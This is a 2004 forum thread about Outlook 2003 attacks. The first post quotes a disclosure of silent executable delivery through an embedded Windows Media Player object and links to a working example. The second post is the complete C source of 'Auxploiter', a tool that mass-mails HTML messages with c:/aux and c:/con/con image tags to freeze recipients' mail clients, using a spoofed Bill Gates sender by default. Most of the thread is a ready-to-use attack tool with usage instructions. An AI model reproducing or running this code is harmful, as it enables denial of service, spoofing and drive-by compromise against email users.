Outlook 2003

qcred11

May 17 2004, 11:21 PM

QUOTE

Monday, May 17, 2004

Technical final step to 'silent delivery and installation of an
executable on the target computer, no client input other than
reading an email' this can be achieved with the highly
touted 'secure-by-default' Outlook 2003 mail client from the
craftsman known as 'Microsoft'.

Default settings of the 'gadget' are: restricted zone which
means no active x controls, no scripting, no file downloads etc.

This can all very easily be bypassed by simply embedding in a
rich text message our OLE object, one Windows Media Player. We
then point our source url to our media file which includes or
now run-of -the mill 0s url flip and simply by previewing or
opening the email message invoke our device known as Internet
Explorer to proxy our manipulation of the recipient's machine.

In typical fashion despite the settings in the Windows Media
Player being set to 'disallow' scripting in media files, despite
Outlook 2003's 'highly' secure default setting of view html
content in the so-called 'restricted zone'; it all still works !

[screen shot: http://www.malware.com/rockitman.png 46KB]

This now all automates our process and coupling it with our
previous first step finding:

[http://www.securityfocus.com/bid/10307]

all we need to do next is our second step and embed the entire
package including the media file into the mail message and send
it along its merry way.

The whole Outlook 2003 'gadget' is broken.

Working Example:

Simply view the mail message:

http://www.malware.com/rockIT.zip

Notes:

1. Miserable selection of full screen = true can allow us to run
our 'video' in WMP full screen mode. How about that: forget
about html spam messages, now we have full screen video
advertisements on opening the mail message.
2. Tested on XP, 2K3 POP mail client settings Outlook 2003,
Exchange Server settings unknown at this time
3. Subject to initial WMP settings a notification of connection
settings can pop up, however generally dismissed at first
running of WMP along with neither yes or no selection having an
effect [as usual].
4. Firewalls should flag Outlook itself trying to escape out on
port 80. Nevertheless if all embedded no need for remote hosting.
5. Disable HTML settings or get another mail client [better of
the two as below]

KillerLoo

May 21 2004, 05:32 PM

################################################################################

## Teolupus Auxploiter v1.0 ##
################################################################################

| |
| - What is it? |
| Auxploiter is a remote exploitation tool for the c:\aux vulnerability able |
| to completely lock user mail client. |
| |
| - How does it work? |
| It works by sending a HTML e-mail message with <img src="file://c:/aux"> and |
| <img src="file://c:/con/con">. Outlook and other mail clients read this mes- |
| sage using Internet Explorer which is touchy to the vulnerability. |
| |
| - Who is vulnerable? |
| This is something that I don't know exactly. I've tested it against Windows |
| XP and it has worked. I suppose that it works with older versions too and |
| would be great to receive user messages talking about their own experiences. |
| |
| - How to compile it? |
| Classical "./configure && make". You can use "make install" but make sure to |
| copy auxploit.msg to somewhere and use with the -b option. |
| |
| - How to use it? |
| ./auxploit -S smtp.server { -t to.email | -T to.email.list } [ options ] |
| Aditional options are: |
| -D Debug mode (useful to know what is happening) |
| -f From email |
| -F From name |
| -s Subject |
| -d Date (dd/mm/yyyy) |
| -b Alternate message body |
| |
| - How can I contribute? |
| First of all, bug repport. If you think that something is wrong, please talk |
| to me. You can find my e-mail in the end of this file. |
| Next step is to add support for SMTP authentication. I'm very busy and don't |
| have time to do it now. Maybe someday I'll find some time to do It, or maybe |
| a very happy user could do and send back to me. |
| |
| - How can I talk to you? |
| Feel free to send me messages at "teolupus@speedmax.com.br". |
| |
|------------------------------------------------------------------------------|
| |
| Very soon I'll keep a security related site at: |
| http://www.brainsystems.com.br/security/ |
| |
& #092;___________________________________________________________________________
_/

/***************************************************************************
* Copyright © 2004 by Teolupus *
* teolupus@speedmax.com.br *
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
***************************************************************************/

#ifdef HAVE_CONFIG_H
#include <config.h>
#endif

#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <errno.h>

#include <sys/socket.h>
#include <resolv.h>

#define PORT_SMTP 25 /* SMTP port */
#define MAXBUF 1024 /* Max buffer size */

char buffer[MAXBUF];
int sockfd, debug=0;

void show_help(void) {
printf("
Teolupus Auxploiter v1.0
Usage: auxploit -S smtp.server { -t to.email | -T to.file.list } [ options ]

-D: Set debug mode
-h: Help

-f: From e-mail
-F: From name
-t: To e-mail
-T: To e-mail file (File with e-mail list)
-s: Subject
-d: Date (dd/mm/yyyy)
-b: Alternate message body

-S: SMTP Server IP

If server require authentication:
(Not implemented yet!)
-u: User
-p: Password

");
}

void send_m(void) {
if(debug != 0) printf("-> %s", buffer);
send(sockfd, buffer, strlen(buffer), 0);
}

void read_m(void) {
int bytes_read = 0;
bzero(buffer, MAXBUF);
bytes_read = recv(sockfd, buffer, MAXBUF, 0);
if (bytes_read > 0 && debug != 0) printf("%s", buffer);
}

void connect_to_server(char *server_ip) {
int bytes_read;
struct sockaddr_in dest;

// Open socket for streaming
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) {
perror("Socket");
exit(errno);
}

// Initialize server address/port struct
bzero(&dest, sizeof(dest));
dest.sin_family = AF_INET;
dest.sin_port = htons(PORT_SMTP);
if ( inet_aton(server_ip, &dest.sin_addr.s_addr) == 0 ) {
perror(server_ip);
exit(errno);
}

// Connect to server
if ( connect(sockfd, (struct sockaddr*)&dest, sizeof(dest)) != 0 ) {
perror("Connect ");
exit(errno);
}

// Get server banner
read_m();

// Send helo
sprintf(buffer, "EHLO localhost.localdomain\n");
send_m();

// Read server answer
read_m();
}

int send_mail(char *from, char *to, char *body_h, char *body) {
int bytes_read;

sprintf(buffer, "MAIL FROM: <%s>\n", from);
send_m();
read_m();

sprintf(buffer, "RCPT TO: <%s>\n", to);
send_m();
read_m();

sprintf(buffer, "DATA\n");
send_m();
read_m();

sprintf(buffer, "%s", body_h);
send_m();

sprintf(buffer, "%s", body);
send_m();

sprintf(buffer, ".\n");
send_m();
read_m();
}

void disconnect_from_server() {
sprintf(buffer, "QUIT\n");
send_m();
read_m();
close(sockfd);
}

char* read_file(char *file) {
FILE *fp;
char *buffer;
unsigned int fsize=0, i=0;
if((fp = fopen(file, "r")) == NULL) {
printf("Error: Could not open %s file\n", optarg);
exit(1);
}
while(!feof(fp)) {
getc(fp);
fsize++;
}
rewind(fp);
buffer = calloc(fsize, sizeof(char));
for(i=0; i<fsize-1; i++) buffer[i] = getc(fp);
buffer[i] = '\0';
fclose(fp);
return buffer;
}

int main(int argc, char *argv[]) {
char a,
*current_target = NULL,
*target_mail = NULL,
*date = NULL,
*subject = NULL,
*sender_mail = NULL,
*sender_name = NULL,
*server_ip = NULL,
*body_file = NULL,
*user = NULL,
*password = NULL,
*body_header = NULL,
*body = NULL;

unsigned int i=0, j=0, k=0, num_of_targets=0, biggest_target=0;

FILE *fp;

struct tm *ltime;
time_t t;
char time_str[50], temp[50];

char months[12][4] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" };

// Parse args
while ((a = getopt (argc, argv, "f:F:t:T:s:d:b:S:u:p:hD"))!=EOF) {
switch(a) {
case 'D': // set debug flag
debug = 1;
break;

case 'h': // help
show_help();
exit(0);
break;

case 'f': // sender e-mail
if((sender_mail = malloc(strlen(optarg)+1)) == NULL) abort();
strcpy(sender_mail, optarg);
break;

case 'F': // sender name
if((sender_name = malloc(strlen(optarg)+1)) == NULL) abort();
strcpy(sender_name, optarg);
break;

case 't': // target e-mail (single target)
if(num_of_targets != 0) {
printf("Error: Invalid doble target specification\n");
exit(1);
}
num_of_targets = 1;
biggest_target = strlen(optarg);
if((target_mail = malloc(strlen(optarg)+1)) == NULL) abort();
sprintf(target_mail, "%s\n", optarg);
break;

case 'T': // peek mails from file (multiple target)
if(num_of_targets != 0) {
printf("Error: Invalid doble target specification\n");
exit(1);
}
target_mail = read_file(optarg);
for(i=0; i<=strlen(target_mail); i++) {
if(target_mail[i] == '\n') {
num_of_targets++;
if(j>biggest_target) biggest_target = j;
j=0;
}
j++;
}
break;

case 's': // email subject
if((subject = malloc(strlen(optarg)+1)) == NULL) abort();
strcpy(subject, optarg);
break;

case 'd': // email date (mm/dd/yyyy)
if((date = malloc(strlen(optarg)+1)) == NULL) abort();
strcpy(date, optarg);
break;

case 'b': // use alternate body (do u know what u r doing?)
body = read_file(optarg);
break;

case 'S': // smtp server ip
if((server_ip = malloc(strlen(optarg)+1)) == NULL) abort();
strcpy(server_ip, optarg);
break;

case 'u': // server require autentication
if((user = malloc(strlen(optarg)+1)) == NULL) abort();
strcpy(user, optarg);
break;

case 'p': // server require autentication
if((password = malloc(strlen(optarg)+1)) == NULL) abort();
strcpy(password, optarg);
break;
}
}

putchar('\n');

printf("Welcome to Teolupus Auxploiter v1.0\n");
if(server_ip != NULL) {
printf("Relax while I Auxploit this %d e-mails\n", num_of_targets);

if(body == NULL) body = read_file("auxploit.msg");
printf("\nExploit Code:\n%s\n", body);

if(subject == NULL) {
if((subject = malloc(20)) == NULL) abort();
strcpy(subject, "You are Auxploited!");
}

if(sender_mail == NULL) {
if((sender_mail = malloc(24)) == NULL) abort();
strcpy(sender_mail, "billgates@microsoft.com");
}

if(sender_name == NULL) {
if((sender_name = malloc(11)) == NULL) abort();
strcpy(sender_name, "Bill Gates");
}

t = time(NULL);
ltime = (struct tm *)localtime(&t);
if(date == NULL) {
strftime(time_str, sizeof(time_str), "%a, %d %b %Y %H:%M:%S -0000", ltime);
} else {
memset(temp, '\0', sizeof(temp));
memset(time_str, '\0', sizeof(time_str));
strftime(temp, sizeof(temp), "%a, ", ltime);
strcat(time_str, temp);
temp[0] = date[0]; temp[1] = date[1], temp[2] = ' ', temp[3] = '\0';
if(atoi(temp) > 31 || atoi(temp) < 1) abort();
strcat(time_str, temp);
temp[0] = date[3]; temp[1] = date[4], temp[3] = '\0';
if(atoi(temp) > 12 || atoi(temp) < 1) abort();
strcat(time_str, months[atoi(temp)-1]);
strcat(time_str, " ");
temp[0] = date[6]; temp[1] = date[7], temp[2] = date[8], temp[3] = date[9], temp[4] = '\0';
strcat(time_str, temp);
strftime(temp, sizeof(temp), " %H:%M:%S -0000", ltime);
strcat(time_str, temp);
}
} else {
printf("Error: -S server_ip is a necessary argument\n");
show_help();
abort();
}

putchar('\n');

connect_to_server(server_ip);
current_target = calloc(biggest_target, sizeof(char));
body_header = calloc(MAXBUF, sizeof(char));
j = k = 0;
for(i=0; i<num_of_targets; i++) {
while(target_mail[j] != '\n') {
if(target_mail[j] == '\n') break;
current_target[k++] = target_mail[j++];
}
current_target[k] = '\0';
k = 0;
j++;
sprintf(body_header, "Message-ID: <12345678.12345678@microsoft.com>\nDate: %s\nFrom: %s <%s>\nUser-Agent: Auxploit by Teolupus\nX-Accept-Language: en-us, en\nMIME-Version: 1.0\nTo: %s\nSubject: %s\nContent-Type: text/html; charset=us-ascii\nContent-Transfer-Encoding: 7bit\n\n", time_str, sender_name, sender_mail, current_target, subject);
if(debug) printf("\n");
printf("Sending -> %s\n", current_target);
if(debug) printf("\n");
send_mail(sender_mail, current_target, body_header, body);
}
disconnect_from_server();

printf("\nFinished\n");
printf("Thanks for using Teolupus Auxploiter\n\n");

return EXIT_SUCCESS;

}

toska

May 21 2004, 07:23 PM

........interesting.